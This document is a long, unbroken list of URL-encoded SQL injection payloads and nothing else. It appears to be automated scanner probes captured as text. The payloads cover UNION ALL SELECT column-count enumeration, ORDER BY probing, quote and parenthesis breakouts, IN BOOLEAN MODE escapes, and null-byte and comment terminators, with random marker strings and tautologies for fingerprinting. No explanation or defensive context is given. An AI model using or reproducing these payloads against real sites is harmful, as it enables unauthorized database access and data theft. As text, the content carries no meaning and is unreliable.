-4093%27%20%2B%20%28SELECT%20%27BqXG%27%20FROM%20DUAL%20WHERE%208589%3D8589%20UNION%20ALL%20SELECT%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589%2C%208589--%20%20%29%20%2B%20%27 -8380%27%20%2B%20%28SELECT%20%27iAiy%27%20FROM%20DUAL%20WHERE%207046%3D7046%20UNION%20ALL%20SELECT%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046%2C%207046--%20%20%29%20%2B%20%27 -9090%27%20%2B%20%28SELECT%20%27Ilal%27%20FROM%20DUAL%20WHERE%209221%3D9221%20UNION%20ALL%20SELECT%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221--%20%20%29%20%2B%20%27 -8168%27%20%2B%20%28SELECT%20%27IRjH%27%20FROM%20DUAL%20WHERE%209706%3D9706%20UNION%20ALL%20SELECT%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706%2C%209706--%20%20%29%20%2B%20%27 -5091%27%20%2B%20%28SELECT%20%27aeyC%27%20FROM%20DUAL%20WHERE%204481%3D4481%20UNION%20ALL%20SELECT%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481%2C%204481--%20%20%29%20%2B%20%27 -2523%27%20%2B%20%28SELECT%20%27xLCH%27%20FROM%20DUAL%20WHERE%207752%3D7752%20UNION%20ALL%20SELECT%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752%2C%207752--%20%20%29%20%2B%20%27 -1417%27%20%2B%20%28SELECT%20%27NBUu%27%20FROM%20DUAL%20WHERE%205174%3D5174%20UNION%20ALL%20SELECT%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174--%20%20%29%20%2B%20%27 -4127%27%20%2B%20%28SELECT%20%27yXpM%27%20WHERE%203108%3D3108%20UNION%20ALL%20SELECT%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108--%20%20%29%20%2B%20%27 -9875%27%20%2B%20%28SELECT%20%27hSaP%27%20WHERE%207855%3D7855%20UNION%20ALL%20SELECT%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855--%20%20%29%20%2B%20%27 -2622%27%20%2B%20%28SELECT%20%27VMDu%27%20WHERE%207572%3D7572%20UNION%20ALL%20SELECT%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572%2C%207572--%20%20%29%20%2B%20%27 -7213%27%20%2B%20%28SELECT%20%27JKaI%27%20WHERE%207851%3D7851%20UNION%20ALL%20SELECT%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851%2C%207851--%20%20%29%20%2B%20%27 -2917%27%20%2B%20%28SELECT%20%27DnZJ%27%20WHERE%203027%3D3027%20UNION%20ALL%20SELECT%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027%2C%203027--%20%20%29%20%2B%20%27 -1328%27%20%2B%20%28SELECT%20%27jEiI%27%20WHERE%207446%3D7446%20UNION%20ALL%20SELECT%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446%2C%207446--%20%20%29%20%2B%20%27 -1912%27%20%2B%20%28SELECT%20%27DCXt%27%20WHERE%204895%3D4895%20UNION%20ALL%20SELECT%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895%2C%204895--%20%20%29%20%2B%20%27 -1239%27%20%2B%20%28SELECT%20%27Nqcd%27%20WHERE%208675%3D8675%20UNION%20ALL%20SELECT%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675--%20%20%29%20%2B%20%27 -4756%27%20%2B%20%28SELECT%20%27fzPT%27%20WHERE%205317%3D5317%20UNION%20ALL%20SELECT%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317--%20%20%29%20%2B%20%27 -6323%27%20%2B%20%28SELECT%20%27YgrB%27%20WHERE%204151%3D4151%20UNION%20ALL%20SELECT%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151%2C%204151--%20%20%29%20%2B%20%27 -1315%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959--%20%20%23 -1429%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230%2C%205230--%20%20%23 -9193%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552--%20%20%23 -9325%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104--%20%20%23 -7809%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096%2C%209096--%20%20%23 -6386%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215%2C%208215--%20%20%23 -5675%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386--%20%20%23 -6496%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352%2C%209352--%20%20%23 -5955%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101%2C%203101--%20%20%23 -4329%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548--%20%20%23 1234.5%29%20ORDER%20BY%201%00 1234.5%29%20ORDER%20BY%204837%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20ORDER%20BY%201%00 1234.5%27%29%20ORDER%20BY%201305%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20ORDER%20BY%201%00 1234.5%27%20ORDER%20BY%202904%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20ORDER%20BY%201%00 1234.5%22%20ORDER%20BY%203180%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20ORDER%20BY%201%00%20AND%20%288200%3D8200 1234.5%29%20ORDER%20BY%201832%00%20AND%20%286764%3D6764 1234.5%29%20UNION%20ALL%20SELECT%20NULL%00%20AND%20%284817%3D4817 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20AND%20%285059%3D5059 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284637%3D4637 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%281004%3D1004 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%288484%3D8484 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%289006%3D9006 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%287335%3D7335 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284653%3D4653 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%281784%3D1784 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%282167%3D2167 1234.5%29%29%20ORDER%20BY%201%00%20AND%20%28%284138%3D4138 1234.5%29%29%20ORDER%20BY%209372%00%20AND%20%28%285882%3D5882 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%00%20AND%20%28%285623%3D5623 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20AND%20%28%283607%3D3607 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%282132%3D2132 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%281878%3D1878 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%281759%3D1759 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284635%3D4635 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%282187%3D2187 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%285981%3D5981 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%289768%3D9768 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%285725%3D5725 1234.5%29%29%29%20ORDER%20BY%201%00%20AND%20%28%28%289652%3D9652 1234.5%29%29%29%20ORDER%20BY%206140%00%20AND%20%28%28%282009%3D2009 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%00%20AND%20%28%28%285759%3D5759 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20AND%20%28%28%289868%3D9868 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%288727%3D8727 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%283860%3D3860 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%288766%3D8766 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%287874%3D7874 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%282717%3D2717 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%286752%3D6752 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%287877%3D7877 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%282489%3D2489 1234.5%20ORDER%20BY%201%00 1234.5%20ORDER%20BY%208947%00 1234.5%20UNION%20ALL%20SELECT%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 